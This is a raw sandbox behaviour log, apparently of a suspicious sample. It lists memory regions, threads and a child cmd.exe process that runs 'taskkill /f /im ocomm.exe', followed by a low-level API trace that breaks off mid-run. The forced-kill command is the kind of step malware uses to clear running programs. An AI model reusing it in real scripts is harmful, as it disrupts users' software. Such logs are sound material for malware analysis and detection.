0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3347 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 3348 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3349 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 3350 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3351 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3352 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3353 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3354 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 3355 start_va = 0x4520000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 3356 start_va = 0x4780000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 3357 start_va = 0x47c0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 3358 start_va = 0x4800000 end_va = 0x483ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 3359 start_va = 0x4840000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 3360 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3361 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3363 start_va = 0x4560000 end_va = 0x4565fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004560000" filename = "" Thread: id = 244 os_tid = 0xffc Thread: id = 245 os_tid = 0xd90 Thread: id = 246 os_tid = 0x9ac Thread: id = 247 os_tid = 0x12b0 Thread: id = 248 os_tid = 0x1278 Process: id = "44" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x555cb000" os_pid = "0x13f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im ocomm.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3373 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3374 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3375 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3376 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3377 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3378 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3379 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3380 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3381 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3382 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3383 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3384 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3385 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3386 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3387 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3388 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3389 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3390 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3391 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3392 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3393 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3394 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3395 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3396 start_va = 0x5d0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 3397 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3398 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3399 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3400 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3401 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3402 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3403 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3404 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 3405 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3406 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3407 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3408 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3409 start_va = 0x860000 end_va = 0xb96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 249 os_tid = 0xeec [0184.026] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0184.026] __set_app_type (_Type=0x1) [0184.026] __p__fmode () returned 0x74974d6c [0184.026] __p__commode () returned 0x74975b1c [0184.027] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0184.027] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0184.027] GetCurrentThreadId () returned 0xeec [0184.027] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeec) returned 0x78 [0184.028] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0184.028] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0184.028] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.033] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0184.033] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0184.034] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.034] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0184.034] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0184.034] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.034] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0184.034] GetConsoleOutputCP () returned 0x1b5 [0184.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0184.035] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0184.035] _get_osfhandle (_FileHandle=1) returned 0x158 [0184.035] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0184.035] _get_osfhandle (_FileHandle=1) returned 0x158 [0184.035] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0184.035] _get_osfhandle (_FileHandle=0) returned 0x154 [0184.035] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0184.036] GetEnvironmentStringsW () returned 0x767cb0* [0184.036] GetProcessHeap () returned 0x760000 [0184.036] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa1a) returned 0x7686d8 [0184.036] FreeEnvironmentStringsA (penv="A") returned 1 [0184.036] GetProcessHeap () returned 0x760000 [0184.036] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4) returned 0x760550 [0184.036] GetEnvironmentStringsW () returned 0x767cb0* [0184.036] GetProcessHeap () returned 0x760000 [0184.036] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa1a) returned 0x769100 [0184.036] FreeEnvironmentStringsA (penv="A") returned 1 [0184.036] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0184.036] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0184.036] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.036] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0184.037] RegCloseKey (hKey=0x88) returned 0x0 [0184.037] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0184.037] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0184.037] RegCloseKey (hKey=0x88) returned 0x0 [0184.037] time (in: timer=0x0 | out: timer=0x0) returned 0x62344226 [0184.038] srand (_Seed=0x62344226) [0184.038] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im ocomm.exe \"" [0184.038] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im ocomm.exe \"" [0184.038] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0184.038] GetProcessHeap () returned 0x760000 [0184.038] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x210) returned 0x769b28 [0184.038] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x769b30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0184.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0184.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0184.038] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.038] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0184.038] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0184.038] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0184.038] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0184.038] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0184.038] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0184.038] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0184.038] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0184.039] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0184.039] GetProcessHeap () returned 0x760000 [0184.039] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7686d8) returned 1 [0184.039] GetEnvironmentStringsW () returned 0x767cb0* [0184.039] GetProcessHeap () returned 0x760000 [0184.039] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa32) returned 0x76a780 [0184.040] FreeEnvironmentStringsA (penv="A") returned 1 [0184.040] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0184.040] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.040] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0184.040] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0184.040] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0184.040] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0184.040] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0184.040] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0184.040] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0184.040] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0184.040] GetProcessHeap () returned 0x760000 [0184.040] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x44) returned 0x7605c8 [0184.040] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0184.041] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0184.041] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0184.041] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x760618 [0184.041] FindClose (in: hFindFile=0x760618 | out: hFindFile=0x760618) returned 1 [0184.041] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x760618 [0184.041] FindClose (in: hFindFile=0x760618 | out: hFindFile=0x760618) returned 1 [0184.041] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0184.041] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x760618 [0184.041] FindClose (in: hFindFile=0x760618 | out: hFindFile=0x760618) returned 1 [0184.042] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0184.042] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0184.042] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0184.042] GetProcessHeap () returned 0x760000 [0184.042] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76a780) returned 1 [0184.042] GetEnvironmentStringsW () returned 0x767cb0* [0184.042] GetProcessHeap () returned 0x760000 [0184.042] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa76) returned 0x769d40 [0184.043] FreeEnvironmentStringsA (penv="=") returned 1 [0184.043] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0184.043] GetProcessHeap () returned 0x760000 [0184.043] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7605c8) returned 1 [0184.043] GetProcessHeap () returned 0x760000 [0184.043] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x400e) returned 0x76bc40 [0184.044] GetProcessHeap () returned 0x760000 [0184.044] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x46) returned 0x76a7c0 [0184.044] GetProcessHeap () returned 0x760000 [0184.044] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4008) returned 0x76fc58 [0184.044] GetProcessHeap () returned 0x760000 [0184.044] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4008) returned 0x773c68 [0184.046] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0184.046] GetProcessHeap () returned 0x760000 [0184.046] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x418) returned 0x76a810 [0184.046] SetErrorMode (uMode=0x0) returned 0x8003 [0184.046] SetErrorMode (uMode=0x1) returned 0x0 [0184.046] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x76a818, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0184.046] SetErrorMode (uMode=0x8003) returned 0x1 [0184.047] GetProcessHeap () returned 0x760000 [0184.047] 